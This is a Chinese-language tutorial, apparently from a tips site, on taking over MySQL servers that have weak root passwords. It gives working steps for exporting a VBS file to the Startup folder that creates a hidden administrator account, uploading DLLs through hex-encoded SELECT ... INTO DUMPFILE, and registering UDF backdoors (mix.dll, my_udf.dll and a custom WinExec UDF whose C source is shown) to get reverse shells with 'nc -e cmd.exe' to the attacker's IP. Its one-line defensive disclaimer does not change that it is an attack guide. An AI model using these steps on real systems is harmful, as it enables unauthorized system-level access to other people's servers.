mysql 弱口令攻击过程详细

下面我们只讲术了入库过程,关于如何写vbs这段我己去了,因是为教程也是告诉各位朋友如何来做好朋友器安全了,有需了解的朋友可以参考一下.

1.连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了MYSQL的的BIN目录中.

2.让我们来看看服务器中有些什么数据库mysql >show databases;MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

3.让我们进入数据库mysql >use test;我们将会进入test数据库中

4.查看我们进入数据库中有些什么数据表mysql >show tables;默认的情况下，test中没有任何表的存在。

以下为关键的部分

5.在TEST数据库下创建一个新的表；mysql >create table a (cmd text);好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

6.在表中插入内容

引用,代码如下:

1. mysql>insertintoavalues("setwshshell=createobject(""wscript.shell"")");
2. mysql>insertintoavalues("a=wshshell.run(""cmd.exe/cnetuser11/add"",0)");--phpfensi.com
3. mysql>insertintoavalues("b=wshshell.run(""cmd.exe/cnetlocalgroupAdministrators1/add"",0)");

注意双引号和括号以及后面的"0"一定要输入,我们将用这三条命令来建立一个VBS的脚本程序.

7.好了，现在我们来看看表a中有些什么mysql >select * from a;我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步

8.输出表为一个VBS的脚本文件mysql >select * from a into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs";我们把我们表中的内容输入到启动组中，是一个VBS 的脚本文件！注意" "符号。

9.看到这大家肯定知道了，就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢，因为启动运行时会有明显的DOS窗口出来，而用VBS脚本则可以完全隐藏窗口且不会有错误提示！本来，应该还有一句完成脚本后自动删除此脚本的，但是中文目录实在无法处理，只有作罢！好了，找个工具攻击135让服务器重启吧

下面看网友操作

下面,我们先说如何生成二进制文件得上传脚本,看看这段mysql脚本代码,网友Mix用的方法,代码如下:

1. set@a=concat('',0x0123abc1312389…..);
2. 　set@a=concat(@a,0x4658978abc545e……);
3. 　………………….
4. 　createtableMix(dataLONGBLOB);//建表Mix,字段为data，类型为longblob
5. 　insertintoMixvalues("");updateMixsetdata=@a;//@a插入表Mix
6. 　selectdatafromMixintoDUMPFILE'C:\Winnt\文件名';//导出表中内容为文件--phpfensi.com

前两句很熟悉把，这个就是我们以前注入的时候，绕过’的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。

脚本生成了，如何上传？先登陆mysql服务器,代码如下:

C:>mysql –u root –h hostip –p

Mysql>use mysql; //先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库

Mysql>. E:*.dll.txt; //这儿就是你生成的mysql脚本

按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！

下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！

先用mix.dll:

登陆mysql,输入命令:

1. Mysql>.e:mix.dll.txt;
2. Mysql>CreateFUNCTIONMixconnectRETURNSSTRINGSONAME'C:\windows\mix.dll';

这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令.

Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端口

过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了,这个的确不错，通过反弹得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select Mixconnect('你的ip','8080');”的时候，对方的mysql会当掉！报错，然后服务停止！

所以,使用mix.dll你只有一次成功,没有再来一次的机会,另外根据我的测试,他对Win2003的系统好像不起作用,代码如下:

再用my_udf.dll:

1. Mysql>.C:my_udf.dll.txt
2. Mysql>CreateFUNCTIONmy_udfdoorRETURNSSTRINGSONAME'C:\winnt\my_udf.dll';

同样地,my_udfdoor也是我们注册后，用来执行系统命令得函数.

Mysql> select my_udfdoor('’); //这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数.

好了，现在你可以不用关这个shell了，我们再开一个cmd，使用：

D:>nc hostip 3306

4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k” ,他是my_udfdoor默认密码，自己无法更改

过一会儿，你就有了系统权限的shell了，由于他是hook recv版，所以穿墙的能力很强，我是在上一个mix.dll反弹失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select my_udfdoor('’);”后），不管你是否连接，只要执行了:

Mysql>drop function my_udfdoor; 后，mysql也汇报错，然后挂掉，

所以，你使用这个dll文件无法删除你的痕迹！最后，然我们自己写一个自定义的dll文件。看能不能解决问题。我们仅仅使用mysql 得udf的示例作模版即可！看他的示例:

1. ＃include<stdlib.h>
2. 　　＃include<winsock.h>
3. 　　＃include<mysql.h>
4. 　　extern"C"{
5. 　　char*my_name(UDF_INIT*initid,UDF_ARGS*args,char*is_null,
6. 　　char*error);
7. 　　//兼容C
8. 　　}
9. 　　char*my_name(UDF_INIT*initid,UDF_ARGS*args,char*is_null,
10. 　　char*error)
11. 　　{
12. 　　char*me="myname";
13. 　　returnme;
14. 　　//调用此UDF将返回myname
15. 　　}

十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了,下面是我的一个哥们Crackme是修改的,代码如下:

1. ＃include<stdlib.h>
2. 　　＃include<windows.h>
3. 　　＃include"mysql.h"
4. 　　extern"C"__declspec(dllexport)char*sys_name(UDF_INIT*initid,UDF_ARGS*args,char*is_null,char*error);//sys_name就是函数名，你可以任意修改
5. 　　__declspec(dllexport)char*sys_name(UDF_INIT*initid,UDF_ARGS*args,char*is_null,char*error)//当然这儿的sys_name也得改！
6. 　　{
7. 　　charme[256]={0};
8. 　　if(args->arg_count==1){
9. 　　strncpy(me,args->args[0],args->lengths[0]);
10. 　　me[args->lengths[0]]='';
11. 　　WinExec(me,SW_HIDE);//就是用它来执行任意命令
12. 　　}else
13. 　　strcpy(me,"dononthing.n");
14. 　　returnme;
15. 　　}

好,我们编译成sysudf.dll文件就可以了,我们来用他实验一把,看操作,代码如下:

1. Mysql>.C:sysudf.dll.txt
2. 　　Mysql>Createfunctionsys_namereturnsstringsoname'C:\windows\sysudf.dll';
3. 　　Mysql>.Nc.exe.txt//把nc.exe也上传上去
4. 　　Mysql>selectsys_name('nc.exe-ecmd.exe我的ip8080');
5. 　　//sys_name参数只有一个，参数指定要执行的系统命令

好，看看在Win2003中的一个反弹shell了,当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确,对于这个dll文件,经过测试,不论何时“drop function sys_name;”,都是不会报错的,同时也可以多次运行不同命令,至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了.